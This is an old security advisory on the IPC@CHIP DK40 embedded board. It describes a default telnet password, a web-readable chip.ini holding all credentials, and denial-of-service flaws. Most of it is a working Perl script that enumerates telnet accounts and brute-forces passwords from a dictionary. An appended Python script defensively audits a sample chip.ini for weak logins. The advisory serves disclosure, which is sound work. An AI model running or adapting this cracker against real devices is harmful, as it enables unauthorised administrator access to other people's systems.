Multiple security issues in IPC@Chip

Published: 2001-05-26
Updated: 2001-05-26
Severity: High
Threat level: Remote administrator access
Error type: Design error
Exploitation mode: Server mode

Affected systems

IPC@CHIP DK40 Evaluation Board

Detailed description

IPC@CHIP (http://www.bcl-online.de/mproducts/products.asp?id=1&status=en_products) is a complete embedded-PC solution that includes a 186 processor, RAM, a flash disk, serial ports, an Ethernet controller and multiple I/O pins. The product has multiple security vulnerabilities that allow remote users to gain administrator-level access, disclose information and cause denial of service.

TelnetD has a default password ("tel"). It permits repeated connection attempts, so it can be brute-forced. By default only one connection to TelnetD is allowed, and by default no timeout is set. Existing user accounts can be discovered by analysing TelnetD's responses.

CHIP.INI in the web server: an attacker can retrieve the chip.ini file via http://ipcchipip/chip.ini; it contains all login names and passwords.

Sending an overly long request to the server slows its responses.

A SYN flood causes the IPC to stop responding.

The ChipCfg script can be downloaded; it contains network data (e.g. http://ipcchipip/ChipCfg).

Test code

    #!/usr/bin/perl -w
    ########################################################
    #                                                      #
    # CrackIPC v0.2b                                       #
    #                                                      #
    # Telnet implementation according to RFC 854           #
    #                                                      #
    # written 2001 by Siberian [Sentry-Security-Labs]      #
    #                                                      #
    # Tested with:                                         #
    # Active Perl (Windows NT)                             #
    # Perl 5.stable (Slackware 3.6 & 7.1)                  #
    #                                                      #
    # This Software is published under GPL v2              #
    #                                                      #
    # FOR EDUCATIONAL PURPOSE ONLY!                        #
    #                                                      #
    # I can't be held responsible for any damage caused    #
    # by the software, direct or indirectly to anything    #
    # or anyone.                                           #
    #                                                      #
    ########################################################
    #                                                      #
    # No animals were harmed during coding of this program, #
    # except some bugs, but we are sorry.                  #
    #                                                      #
    ########################################################

    use Socket;

    # Send the account name, then the next dictionary word, and read the reply.
    sub guesspass {
        if (defined($pass = <FILE2>)) {
            chomp($pass);
            $user2 = join '', $uda, chr(13), chr(10);
            send(SOCK, $user2, 0);
            while (($out ne "P") && ($out ne "C")) {
                recv(SOCK, $out, 1, 0);
            }
            if ($out eq "P") {
                print "Invalid username!";
            }
            $pdas = $pass;
            $pass = join '', $pass, chr(13), chr(10);
            send(SOCK, $pass, 0);
            while (($out ne "U") && ($out ne "I")) {
                recv(SOCK, $out, 1, 0);
            }
            recv(SOCK, $out, 1, 0);
            if ($out eq "s") {
                print "\nWarning! Found valid password for account \"$uda\"! Password is \"$pdas\"\n";
                exit 0;
            }
        }
        else {
            print "Can\'t crack the password!";
            exit 0;
        }
    }

    # First try the default login, then names from the user file; the reply
    # that follows a name shows whether the account exists.
    sub guessuser {
        if ($deftest eq "0") {
            print "Checking DEFAULT login...\n";
            $user = "tel";
            $user = join '', $user, chr(13), chr(10);
            send(SOCK, $user, 0);
            $deftest = "1";
            while (($out ne "P") && ($out ne "C")) {
                recv(SOCK, $out, 1, 0);
            }
            if ($out eq "P") {
                print "\nWarning! Valid DEFAULT account found! User:\"tel\" Pass:\"tel\"\n";
                close(SOCK);
                close(FILE1);
                close(FILE2);
                exit 0;
            }
        }
        else {
            if (defined($user = <FILE1>)) {
                chomp($user);
                $uda = $user;
                $user = join '', $user, chr(13), chr(10);
                send(SOCK, $user, 0);
                while (($out ne "P") && ($out ne "C")) {
                    recv(SOCK, $out, 1, 0);
                }
                if ($out eq "P") {
                    print "\nFound valid user account \"$uda\"! Trying to crack it...\n";
                    $fuser = $uda;
                }
            }
            else {
                print "Can\'t identify any valid user!";
                exit 0;
            }
        }
    }

    # Connect to the telnet port and read the banner one byte at a time,
    # looking for the "login:" prompt.
    sub conit {
        $iaddr = inet_aton($remote) or die "No target host computer found!";
        $paddr = sockaddr_in(23, $iaddr);
        $prot = getprotobyname('tcp');
        socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
        connect(SOCK, $paddr) || die "Can't connect to target host!";
        while (recv(SOCK, $out, 1, 0)) {
            if ($fuser eq "") {
                if ($out eq "i") {
                    recv(SOCK, $out, 1, 0);
                    if ($out eq "o") {
                        recv(SOCK, $out, 1, 0);
                        if ($out eq "n") {
                            print "Connected to SC12... found Telnet Session!\n";
                        }
                    }
                }
                if ($out eq "g") {
                    recv(SOCK, $out, 1, 0);
                    if ($out eq "i") {
                        recv(SOCK, $out, 1, 0);
                        if ($out eq "n") {
                            recv(SOCK, $out, 1, 0);
                            if ($out eq ":") {
                                recv(SOCK, $out, 1, 0);
                                guessuser();
                            }
                        }
                    }
                }
            }
            else {
                guesspass();
            }
        }
    }

    print "\nIPC\@CHIP Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n";
    print "Latest Version at www.sentry-labs.de.vu\n\n";

    $remote = shift || die "usage: ./crackipc.pl [target host] (-u)[userfile (user)] [dictionary]";
    $userf = shift || die "usage: ./crackipc.pl [target host] (-u) [userfile (user)] [dictionary]";
    $passf = shift || die "usage: ./crackipc.pl [target host] [userfile (user)] [dictionary]";

    # With -u the next argument is a single account name, not a user file.
    if ($userf eq "-u") {
        $fuser = $passf;
        $uda = $fuser;
        print "Attacking account \"$fuser\"...\n";
        $passf = shift || die "usage: ./crackipc.pl [target host] [userfile (user)] [dictionary]";
        open(FILE2, "$passf") || die "Can't open dictionary file!";
        conit();
        guesspass();
    }

    $deftest = "0";
    $fuser = "";
    open(FILE1, "$userf") || die "Can't open usernames file!";
    open(FILE2, "$passf") || die "Can't open dictionary file!";
    conit();
    close(FILE1);
    close(FILE2);
    close(SOCK);
    exit 0;

Solution

None yet.

Related information

i.am.a at x-men.com
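An added example, not part of the original advisory or the vendor's code: since chip.ini can be fetched over HTTP, every credential in it has to be treated as exposed, and this script audits a copy of the file taken from your own device for the default "tel" login and other weak entries. The `[TELNET]`/`[FTP]` section names and the `USERn`/`PASSWORDn` keys are assumptions, because the advisory does not show the file's layout; the sample file is constructed.

```python
import configparser
import re

DEFAULT_TELNET = ("tel", "tel")  # default telnet login named in the advisory

# Constructed sample. Section and key names are assumptions; the advisory
# does not show the real layout of chip.ini.
SAMPLE_CHIP_INI = """\
[TELNET]
USER0=tel
PASSWORD0=tel
USER1=admin
PASSWORD1=s3cret-Example
[FTP]
USER0=ftp
PASSWORD0=
"""


def audit_chip_ini(text):
    """Map (section, user) to the list of issues found for that account."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False,
                                    allow_no_value=True)
    cfg.read_string(text)
    report = {}
    for section in cfg.sections():
        for key, user in cfg.items(section):
            m = re.fullmatch(r"user(\d+)", key)  # configparser lowercases keys
            if not m or not user:
                continue
            password = cfg.get(section, "password" + m.group(1), fallback="") or ""
            issues = []
            if not password:
                issues.append("empty password")
            else:
                # Anything stored here is readable by whoever can fetch the file.
                issues.append("password stored in plaintext")
                if password == user:
                    issues.append("password equals username")
                if section.upper() == "TELNET" and (user, password) == DEFAULT_TELNET:
                    issues.append("default telnet login")
            report[(section, user)] = issues
    return report


if __name__ == "__main__":
    for (section, user), issues in audit_chip_ini(SAMPLE_CHIP_INI).items():
        print(f"[{section}] {user}: {', '.join(issues)}")
```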